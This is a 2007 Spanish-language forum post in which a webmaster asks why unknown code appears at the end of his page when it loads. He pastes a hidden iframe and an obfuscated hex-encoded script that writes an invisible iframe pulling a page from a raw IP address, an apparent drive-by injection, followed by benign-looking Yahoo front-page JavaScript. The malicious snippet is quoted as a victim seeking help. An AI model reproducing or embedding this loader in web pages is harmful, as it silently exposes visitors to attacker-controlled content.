
21/12/2007, 10:32
|
| | Fecha de Ingreso: junio-2006 Ubicación: Lima, mi trabajo
Mensajes: 100
Antigüedad: 18 años, 9 meses Puntos: 0 | |
javascript malicioso yahoo Hola
quisiera orientacion sobre codigo que se ha agregado a mi pagina, solo cuando carga, pq en mi codigo no esta, parte de codigo es el siguiente, porfavor is alguien sabe de donde podria venir eses codigo malicioso que me lo diga, por que no tengo la menor idea de por que salio
cuando veo el codigo fuente de la pagina se ve esto al final de todo
Código:
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe>
<script>
function v47654ff8e3f0c(v47654ff8e42ef){ return(parseInt(v47654ff8e42ef,16));}function v47654ff8e4ea9(v47654ff8e527d){ function v47654ff8e5e33 () {var v47654ff8e621d=2; return v47654ff8e621d;} var v47654ff8e5666='';for(v47654ff8e5a4d=0; v47654ff8e5a4d<v47654ff8e527d.length; v47654ff8e5a4d+=v47654ff8e5e33()){ v47654ff8e5666+=(String.fromCharCode(v47654ff8e3f0c(v47654ff8e527d.substr(v47654ff8e5a4d, v47654ff8e5e33()))));}return v47654ff8e5666;} document.write(v47654ff8e4ea9('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D32207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323538353532292B2733393565386131365C272077696474683D363438206865696768743D333939207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));
</script>
Y al ver el codigo javascript en mozilla entre otras cosas se ve lo siguiente:
Código:
_lcs = decodeURIComponent(_lcs);
3var YAHOO=window.YAHOO||{};YAHOO.namespace=function(ns){if(!ns||!ns.length){return null;}var _2=ns.split(".");var _3=YAHOO;for(var i=(_2[0]=="YAHOO")?1:0;i<_2.length;++i){_3[_2[i]]=_3[_2[i]]||{};_3=_3[_2[i]];}return _3;};YAHOO.log=function(_5,_6,_7){var l=YAHOO.widget.Logger;if(l&&l.log){return l.log(_5,_6,_7);}else{return false;}};YAHOO.extend=function(_9,_10){var f=function(){};f.prototype=_10.prototype;_9.prototype=new f();_9.prototype.constructor=_9;_9.superclass=_10.prototype;if(_10.prototype.constructor==Object.prototype.constructor){_10.prototype.constructor=_10;}};YAHOO.namespace("util");YAHOO.namespace("widget");YAHOO.namespace("example");
4YAHOO.namespace("Fd");
5YAHOO.namespace("Fp");
6YAHOO.Fp.nScreenWidth = (screen && typeof(screen.availWidth)=='number') ? screen.availWidth : false;
7YAHOO.Fp.bNarrow = (YAHOO.Fp.nScreenWidth ? (YAHOO.Fp.nScreenWidth<1024 ? 1 : 0) : -1);
8YAHOO.Fp.d = document;
9YAHOO.Fp.$ = function(id){
10return (typeof(id)=='string') ? YAHOO.Fp.d.getElementById(id) : false;
11};
12YAHOO.Fp._hostname=location.hostname;
13YAHOO.Fp.beacon = function(sUrl, clearUlt, useYlh){
14if(sUrl.indexOf('http')<0 && YAHOO.Fp._ylh!=''){
15if(clearUlt){
16YAHOO.cookie.set("D","","-1","/","yahoo.com");
17}
18sUrl=((clearUlt||useYlh)&&YLH)? '/'+YLH+'/'+ sUrl : sUrl;
19}
20var oImage = new Image();
21oImage.src = sUrl+'/*-http://'+YAHOO.Fp._hostname+'/iv.gif?t=' + new Date().getTime();
22setTimeout(function(){oImage = null;}, 1e4);
23};
24YAHOO.Fp.becon=YAHOO.Fp.beacon;
25YAHOO.cookie = {
26get : function(n){
27var v = '',
28c = ' ' + document.cookie + ';',
29s = c.indexOf((' ' + n + '='));
30if (s >= 0) {
31s += n.length + 2;
32v = unescape(c.substring(s, c.indexOf(';', s)));
33}
34return v;
35},
36set : function(n,v){
37var a=arguments,al=a.length;
38document.cookie = n + "=" + v +
39((al>2&&a[2]!="") ? ";expires=" + (typeof(a[2])=="object" ? a[2].toGMTString() : (new Date(a[2] * 1000)).toGMTString()) : "") +
40";path=" + ((al>3&&a[3]!="") ? a[3] : "/") +
41";domain=" + ((al>4&&a[4]!="") ? a[4] : "www.yahoo.com");
42},
43checksub : function(sCookie,s){
44var aParts = sCookie.split('&'),nParts = aParts.length,aKeyVal;
45if (nParts==1) {
46return sCookie.indexOf(s);
47} else {
48for(var i=0; i<nParts; i++){
49aKeyVal = aParts[i].split('=');
50if(aKeyVal[0]==s){
51return i;
52}
53}
54}
55return -1;
56},
57getsub : function(n,s){
58var sCookie = this.get(n);
59var nExists = this.checksub(sCookie,s);
60if (nExists>-1) {
61return sCookie.split('&')[nExists].split('=')[1];
62} else if (sCookie.indexOf(s)>0) {
63return sCookie.split('=')[1];
64}
65return '';
66},
67setsub : function(n,s,v){
68var sCookie = this.get(n),a=arguments,al=a.length;
69var aParts = sCookie.split('&');
70var nExists = this.checksub(sCookie,s);
71if (sCookie=='') {
72sNewVal=(s+'='+v).toString();
73} else {
74if(nExists==-1){nExists=aParts.length;}
75aParts[nExists]=s+'='+v;
76sNewVal = aParts.join('&');
77}
78return this.set(n,sNewVal,(a[3]||''),(a[4]||'/'),(a[5]||'www.yahoo.com'));
79}
80}
81YAHOO.Fp.changePageSize = function(bCheck){
82if((location.search.indexOf('rs=')!=1 && location.pathname.indexOf('cgi')<0) || !bCheck){
83if(bCheck){
84var bcn=new Image;
85bcn.src='http://www.yahoo.com/'+(ylp?ylp:'p.gif')+'&igpv=1';
86}
87location.replace('http://'+location.hostname+location.pathname+(bCheck ? '?rs=1' : ''));
88}
89}
90YAHOO.Fp.sPhpFsCookie="dl";YAHOO.Fp.sFsCookie = YAHOO.cookie.get("FPS");
91if(YAHOO.Fp.sFsCookie.indexOf("t")!=0 && YAHOO.Fp.bNarrow!=-1){
92YAHOO.cookie.set("FPS",(YAHOO.Fp.bNarrow ? "ds" : "dl"),400*3600000);
93if(YAHOO.Fp.bNarrow==1){
94YAHOO.Fp.changePageSize(1);
95}
96}else if(YAHOO.Fp.sPhpFsCookie != YAHOO.Fp.sFsCookie){
97YAHOO.Fp.changePageSize(1);
98}
99YAHOO.Fp.togglePageSize = function(sSize){
100YAHOO.cookie.set("FPS",sSize,400*3600000);
101YAHOO.Fp.changePageSize(0);
102}
103YAHOO.Fp.nPageSize = 0;
104YAHOO.Fp._ie=YAHOO.Fp._ie7=YAHOO.Fp._ie55=0;
105YAHOO.Fp._ff=1;
106YAHOO.Fp._ffv=parseFloat("2.0.0",10);
107YAHOO.Fp._ns=0;
108YAHOO.Fp._nsv=parseFloat("0",10);
109YAHOO.Fp._sf=0;
110YAHOO.Fp._sfv=parseFloat("0",10);
111YAHOO.Fp._op=0;
112YAHOO.Fp._mac=0;
113YAHOO.Fp._ylh = typeof(YLH)!='undefined'?YLH+'/':'';
Última edición por luz506; 21/12/2007 a las 10:42 |